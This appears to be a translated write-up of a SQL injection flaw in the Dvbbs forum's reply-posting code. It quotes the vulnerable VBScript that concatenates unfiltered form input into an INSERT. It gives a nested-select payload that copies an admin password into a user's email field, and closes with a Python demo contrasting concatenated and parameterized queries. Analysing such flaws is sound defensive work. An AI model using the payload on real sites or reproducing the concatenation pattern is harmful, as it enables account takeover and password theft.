Look at the following:
------------------------------
Dim Buy_Orders, Buy_VIPType, Buy_UserList
' read the submitted form values
Buy_Orders = Request.Form("Buy_Orders")
Buy_VIPType = Request.Form("Buy_VIPType")
Buy_UserList = Request.Form("Buy_UserList")
If Buy_Orders <> "" And IsNumeric(Buy_Orders) Then
    Buy_Orders = CCur(Buy_Orders)
Else
    Buy_Orders = -1
End If
If Not IsNumeric(Buy_VIPType) Then Buy_VIPType = 0
' only the record separators are stripped from Buy_UserList; quotes pass through untouched
If Buy_UserList <> "" Then Buy_UserList = Replace(Replace(Replace(Buy_UserList, "|||", ""), "@@@", ""), "$PayMoney", "")
ToolsBuyUser = "0@@@" & Buy_Orders & "@@@" & Buy_VIPType & "@@@" & Buy_UserList & "|||$PayMoney|||"
GetMoneyType = 3
'UseTools = ToolsInfo(4)
End Select
------------------------------------
Now look further down:
------------------------------
Public Sub Insert_To_Announce()   ' insert into the reply table
    Dim UbblistBody
    UbblistBody = Content
    UbblistBody = Ubblist(Content)
    ' the values, including ToolsBuyUser, are concatenated straight into the SQL text
    SQL = "insert into " & TotalUseTable & "(Boardid,ParentID,username,topic,body,DateAndTime,length,RootID,layer,orders,ip,Expression,locktopic,signflag,emailflag,isbest,PostUserID,isupload,IsAudit,Ubblist,GetMoney,UseTools,PostBuyUser,GetMoneyType) values (" & _
          Dvbbs.boardid & "," & ParentID & ",'" & username & "','" & topic & "','" & Content & "','" & DateTimeStr & "','" & Dvbbs.strlength(Content) & "'," & RootID & "," & ilayer & "," & iorders & ",'" & Dvbbs.UserTrueIP & "','" & Expression(1) & "'," & locktopic & "," & signflag & "," & mailflag & ",0," & Dvbbs.userid & "," & ihaveupfile & "," & IsAudit & ",'" & UbblistBody & "'," & ToMoney & ",'" & UseTools & "','" & ToolsBuyUser & "'," & GetMoneyType & ")"
    Dvbbs.Execute(sql)
------------------------------------
An explanation of the injection. The injection statement takes the form select(XXXX select(XXX select(*) XXXX) XXXXX), that is, queries can be nested. For example:

update Dv_User set UserEmail=77169@sohu.com where [UserName]='77169.com';--

(update the table, set the field to 77169@sohu.com, where the user name is 77169.com.) Its function is to change the email address of the user named 77169.com to 77169@sohu.com. If 77169@sohu.com is a variable, and that variable is not properly filtered, we can construct our own statement by setting

77169@sohu.com=(select [Password] from Dv_admin where[Username]='yellowcat')

which turns the statement into the injection:

update Dv_User set UserEmail=(select [Password] from Dv_admin where[Username]='yellowcat') where[UserName]='77169.com';--
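As an added illustration (not Dvbbs code; it models the two snippets above in Python with an in-memory SQLite table, assuming a constructed table Dv_bbs1 with only the two relevant columns), the following shows that the Replace() chain strips just the record separators, so a single quote in Buy_UserList still leaves the string context of the concatenated INSERT, while a parameterized INSERT stores the same value verbatim:

```python
import sqlite3


def sanitize_buy_userlist(buy_userlist: str) -> str:
    """Mirror of the page's Replace() chain: only "|||", "@@@" and "$PayMoney"
    are removed; quotes and SQL keywords are left untouched."""
    for sep in ("|||", "@@@", "$PayMoney"):
        buy_userlist = buy_userlist.replace(sep, "")
    return buy_userlist


def tools_buy_user(buy_orders: str, buy_viptype: int, buy_userlist: str) -> str:
    """Builds the ToolsBuyUser field the same way the VBScript does."""
    return f"0@@@{buy_orders}@@@{buy_viptype}@@@{sanitize_buy_userlist(buy_userlist)}|||$PayMoney|||"


def new_db() -> sqlite3.Connection:
    # Constructed stand-in for the reply table; Dvbbs has many more columns.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Dv_bbs1 (PostUserID INTEGER, PostBuyUser TEXT)")
    return conn


def insert_concatenated(conn: sqlite3.Connection, user_id: int, post_buy_user: str) -> None:
    # Vulnerable: same pattern as SQL = "insert into ... '" & ToolsBuyUser & "' ..."
    sql = f"insert into Dv_bbs1 (PostUserID, PostBuyUser) values ({user_id}, '{post_buy_user}')"
    conn.execute(sql)


def insert_parameterized(conn: sqlite3.Connection, user_id: int, post_buy_user: str) -> None:
    # Hardened: the value is bound as a parameter and never becomes SQL text.
    conn.execute("insert into Dv_bbs1 (PostUserID, PostBuyUser) values (?, ?)",
                 (user_id, post_buy_user))


def stored_values(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("select PostBuyUser from Dv_bbs1")]


def demo(buy_userlist: str) -> dict:
    """Runs both inserts on the same sanitized input and reports what happened."""
    value = tools_buy_user("10", 0, buy_userlist)
    result = {"concat_error": None, "concat_stored": [], "param_stored": []}
    conn = new_db()
    try:
        insert_concatenated(conn, 1, value)
        result["concat_stored"] = stored_values(conn)
    except sqlite3.OperationalError as exc:  # the quote broke out of the literal
        result["concat_error"] = str(exc)
    conn = new_db()
    insert_parameterized(conn, 1, value)
    result["param_stored"] = stored_values(conn)
    return result
```

With a benign Buy_UserList both variants store the same row; once the input contains a single quote, the concatenated statement no longer parses as intended while the parameterized one stores the quote as data.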